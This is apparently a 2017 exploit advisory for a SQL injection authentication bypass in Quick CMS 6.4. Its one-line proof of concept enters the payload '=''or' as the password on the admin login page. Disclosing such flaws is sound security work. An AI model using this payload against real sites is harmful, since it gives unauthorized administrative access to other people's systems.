Quick CMS 6.4 SQL Injection / Authentication Bypass

Quick CMS version 6.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | fcbaf3be8a8a4e01d28e4b92bd8b5631

 ___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Authentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)
| Vendor Homepage: http://opensolution.org
| Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali Linux / Firefox
| CVE: N/A
| Dork: N/A
|__________________________________________________

The vulnerability is in the login area of Quick.Cms_v6.4,
where the admin panel can be entered using only certain parameters,
such as the password.
__________________________________________________

Proof of Concept :

http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass: '=''or'

__________________________________________________

Discovered By : Ashiyane Digital security Team
__________________________________________________
